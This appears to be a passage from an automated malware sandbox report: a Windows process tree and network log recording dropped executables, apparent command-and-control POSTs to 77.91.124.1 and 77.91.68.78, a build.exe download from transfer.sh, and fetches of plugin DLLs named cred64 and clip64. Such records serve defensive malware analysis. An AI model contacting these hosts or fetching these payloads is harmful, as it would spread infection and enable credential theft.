C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:15⤵PID:3884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:85⤵PID:5488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,4157808318443751459,13144712291463376527,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5308 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:4892
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3736 -ip 37361⤵PID:2172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5060 -ip 50601⤵PID:3320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3268 -ip 32681⤵PID:2644
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1644
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2256
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4324
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5868
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5936
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5960
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5740
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1240
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:1664
-
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exeC:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe1⤵
- Executes dropped EXE
PID:2208
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:3956
-
C:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exeC:\Users\Admin\AppData\Local\Temp\cb378487cf\legota.exe1⤵
- Executes dropped EXE
PID:3488
Network
-
Remote address:8.8.8.8:53Request59.128.231.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.202.248.87.in-addr.arpaIN PTRResponse1.202.248.87.in-addr.arpaIN PTRhttps-87-248-202-1amsllnwnet
-
Remote address:8.8.8.8:53Request22.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request2.136.104.51.in-addr.arpaIN PTRResponse
-
Remote address:77.91.124.1:80RequestPOST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:77.91.68.78:80RequestPOST /help/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.78
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 76
Content-Type: text/html; charset=UTF-8
-
Remote address:77.91.68.78:80RequestPOST /help/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.78
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 3
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requesttransfer.shIN AResponsetransfer.shIN A144.76.136.153
-
Remote address:144.76.136.153:443RequestGET /CmTaUQAD5K/build.exe HTTP/1.1
Host: transfer.sh
ResponseHTTP/1.1 200 OK
Connection: keep-alive
Content-Disposition: attachment; filename="build.exe"
Content-Length: 717824
Content-Type: application/x-msdos-program
Retry-After: Thu, 05 Oct 2023 10:22:10 GMT
Server: Transfer.sh HTTP Server
Vary: Range, Referer, X-Decrypt-Password
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 154.61.71.51
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1696494130
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Date: Thu, 05 Oct 2023 08:22:08 GMT
-
Remote address:8.8.8.8:53Request1.124.91.77.in-addr.arpaIN PTRResponse1.124.91.77.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request78.68.91.77.in-addr.arpaIN PTRResponse78.68.91.77.in-addr.arpaIN PTRhosted-by yeezyhostnet
-
Remote address:8.8.8.8:53Request153.136.76.144.in-addr.arpaIN PTRResponse153.136.76.144.in-addr.arpaIN PTRtransfersh
-
Remote address:8.8.8.8:53Request147.174.42.23.in-addr.arpaIN PTRResponse147.174.42.23.in-addr.arpaIN PTRa23-42-174-147deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A157.240.247.35
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A142.250.179.141
-
Remote address:142.250.179.141:443RequestGET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2Fmsedge.exeRemote address:142.250.179.141:443RequestGET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:Gdg9--BO1wwMor5k1nOQ1njbVCE3QA:oMkNuuBkPLzBYQfl
-
Remote address:8.8.8.8:53Requeststatic.xx.fbcdn.netIN AResponsestatic.xx.fbcdn.netIN CNAMEscontent.xx.fbcdn.netscontent.xx.fbcdn.netIN A157.240.201.15
-
Remote address:8.8.8.8:53Request141.179.250.142.in-addr.arpaIN PTRResponse141.179.250.142.in-addr.arpaIN PTRams17s10-in-f131e100net
-
Remote address:8.8.8.8:53Request19.240.123.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request9.175.53.84.in-addr.arpaIN PTRResponse9.175.53.84.in-addr.arpaIN PTRa84-53-175-9deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestfacebook.comIN AResponsefacebook.comIN A157.240.201.35
-
Remote address:8.8.8.8:53Requestfbcdn.netIN AResponsefbcdn.netIN A157.240.201.35
-
Remote address:8.8.8.8:53Request15.201.240.157.in-addr.arpaIN PTRResponse15.201.240.157.in-addr.arpaIN PTRxx-fbcdn-shv-01-ams4fbcdnnet
-
Remote address:8.8.8.8:53Request35.201.240.157.in-addr.arpaIN PTRResponse35.201.240.157.in-addr.arpaIN PTRedge-star-mini-shv-01-ams4facebookcom
-
Remote address:8.8.8.8:53Requestfbsbx.comIN AResponsefbsbx.comIN A157.240.201.35
-
Remote address:8.8.8.8:53Request195.179.250.142.in-addr.arpaIN PTRResponse195.179.250.142.in-addr.arpaIN PTRams15s42-in-f31e100net
-
Remote address:8.8.8.8:53Request131.179.250.142.in-addr.arpaIN PTRResponse131.179.250.142.in-addr.arpaIN PTRams17s10-in-f31e100net
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.20.238.8.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.251.36.14
-
Remote address:142.251.36.14:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request14.36.251.142.in-addr.arpaIN PTRResponse14.36.251.142.in-addr.arpaIN PTRams15s44-in-f141e100net
-
Remote address:8.8.8.8:53Request196.168.217.172.in-addr.arpaIN PTRResponse196.168.217.172.in-addr.arpaIN PTRams16s32-in-f41e100net
-
Remote address:8.8.8.8:53Request55.36.223.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301011_1Q64Y8U9UJ0Y7FTOQ&pid=21.2&w=1920&h=1080&c=4Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239317301011_1Q64Y8U9UJ0Y7FTOQ&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 171891
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 229DBAAFF9EE483FAE9237C139ED7B3A Ref B: DUS30EDGE0819 Ref C: 2023-10-05T08:22:37Z
date: Thu, 05 Oct 2023 08:22:37 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 233452
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0A3459466DD345BF98D26C236C2A9867 Ref B: DUS30EDGE0819 Ref C: 2023-10-05T08:22:37Z
date: Thu, 05 Oct 2023 08:22:37 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317300941_1T733J08WF3629NM7&pid=21.2&w=1920&h=1080&c=4Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239317300941_1T733J08WF3629NM7&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 362493
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 01C8B8B8F05D4EBFBC2142336A82E7BE Ref B: DUS30EDGE0819 Ref C: 2023-10-05T08:22:38Z
date: Thu, 05 Oct 2023 08:22:37 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301444_1ADW5UG9KMTHYULQ8&pid=21.2&w=1080&h=1920&c=4Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239317301444_1ADW5UG9KMTHYULQ8&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 180287
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B7B53495BB36409A8B8CF76DEE4EC3E7 Ref B: DUS30EDGE0819 Ref C: 2023-10-05T08:22:38Z
date: Thu, 05 Oct 2023 08:22:38 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301374_13OLU7GJIAZBI3QGK&pid=21.2&w=1080&h=1920&c=4Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239317301374_13OLU7GJIAZBI3QGK&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 345334
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 32C7D0C7D1234B19B37E2418D4F18DAF Ref B: DUS30EDGE0819 Ref C: 2023-10-05T08:22:38Z
date: Thu, 05 Oct 2023 08:22:38 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 174745
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0F08C19757494FA9BB99C29704FE38C8 Ref B: DUS30EDGE0819 Ref C: 2023-10-05T08:22:41Z
date: Thu, 05 Oct 2023 08:22:41 GMT
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
Remote address:8.8.8.8:53Request240.81.21.72.in-addr.arpaIN PTRResponse
-
Remote address:77.91.124.1:80RequestGET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.124.1:80RequestGET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:77.91.68.78:80RequestGET /help/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.78
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.78:80RequestGET /help/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.78
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 06 Sep 2023 11:40:52 GMT
ETag: "16400-604af373ed405"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request22.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request9.173.189.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A142.250.179.141
-
260 B 5
-
512 B 365 B 6 5
HTTP Request
POST http://77.91.124.1/theme/index.phpHTTP Response
200 -
774 B 689 B 8 7
HTTP Request
POST http://77.91.68.78/help/index.phpHTTP Response
200HTTP Request
POST http://77.91.68.78/help/index.phpHTTP Response
200 -
25.7kB 746.0kB 549 545
HTTP Request
GET https://transfer.sh/CmTaUQAD5K/build.exeHTTP Response
200 -
142.250.179.141:443https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2Ftls, http2msedge.exe2.2kB 8.7kB 17 21
HTTP Request
GET https://accounts.google.com/HTTP Request
GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F -
23.4kB 329.1kB 167 275
-
943 B 3.0kB 8 7
-
943 B 3.0kB 8 7
-
16.0kB 413.2kB 242 385
-
943 B 3.0kB 8 7
-
943 B 3.0kB 8 7
-
943 B 3.0kB 8 7
-
1.7kB 3.7kB 13 14
-
1.9kB 5.2kB 16 18
-
142.251.36.14:443https://play.google.com/log?format=json&hasfast=true&authuser=0tls, http2msedge.exe1.8kB 8.3kB 15 13
HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0 -
260 B 5
-
260 B 5
-
204.79.197.200:443https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4tls, http253.1kB 1.5MB 1115 1112
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301011_1Q64Y8U9UJ0Y7FTOQ&pid=21.2&w=1920&h=1080&c=4HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301020_14A3TVXX0O1AF1LY0&pid=21.2&w=1920&h=1080&c=4HTTP Response
200HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317300941_1T733J08WF3629NM7&pid=21.2&w=1920&h=1080&c=4HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301444_1ADW5UG9KMTHYULQ8&pid=21.2&w=1080&h=1920&c=4HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301374_13OLU7GJIAZBI3QGK&pid=21.2&w=1080&h=1920&c=4HTTP Response
200HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239317301453_1HOUYPI9NYZFL407Y&pid=21.2&w=1080&h=1920&c=4HTTP Response
200 -
260 B 5
-
4.2kB 101.8kB 80 79
HTTP Request
GET http://77.91.124.1/theme/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.124.1/theme/Plugins/clip64.dllHTTP Response
200 -
3.9kB 94.8kB 75 74
HTTP Request
GET http://77.91.68.78/help/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.78/help/Plugins/clip64.dllHTTP Response
200 -
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
260 B 5
-
208 B 4
-
71 B 157 B 1 1
DNS Request
59.128.231.4.in-addr.arpa
-
71 B 116 B 1 1
DNS Request
1.202.248.87.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
2.136.104.51.in-addr.arpa
-
57 B 73 B 1 1
DNS Request
transfer.sh
DNS Response
144.76.136.153
-
70 B 83 B 1 1
DNS Request
1.124.91.77.in-addr.arpa
-
70 B 107 B 1 1
DNS Request
78.68.91.77.in-addr.arpa
-
73 B 98 B 1 1
DNS Request
153.136.76.144.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
147.174.42.23.in-addr.arpa
-
62 B 107 B 1 1
DNS Request
www.facebook.com
DNS Response
157.240.247.35
-
65 B 81 B 1 1
DNS Request
accounts.google.com
DNS Response
142.250.179.141
-
8.2kB 125.2kB 76 129
-
65 B 104 B 1 1
DNS Request
static.xx.fbcdn.net
DNS Response
157.240.201.15
-
74 B 113 B 1 1
DNS Request
141.179.250.142.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
19.240.123.52.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
9.175.53.84.in-addr.arpa
-
58 B 74 B 1 1
DNS Request
facebook.com
DNS Response
157.240.201.35
-
55 B 71 B 1 1
DNS Request
fbcdn.net
DNS Response
157.240.201.35
-
73 B 117 B 1 1
DNS Request
15.201.240.157.in-addr.arpa
-
73 B 126 B 1 1
DNS Request
35.201.240.157.in-addr.arpa
-
55 B 71 B 1 1
DNS Request
fbsbx.com
DNS Response
157.240.201.35
-
74 B 112 B 1 1
DNS Request
195.179.250.142.in-addr.arpa
-
74 B 112 B 1 1
DNS Request
131.179.250.142.in-addr.arpa
-
528 B 8
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
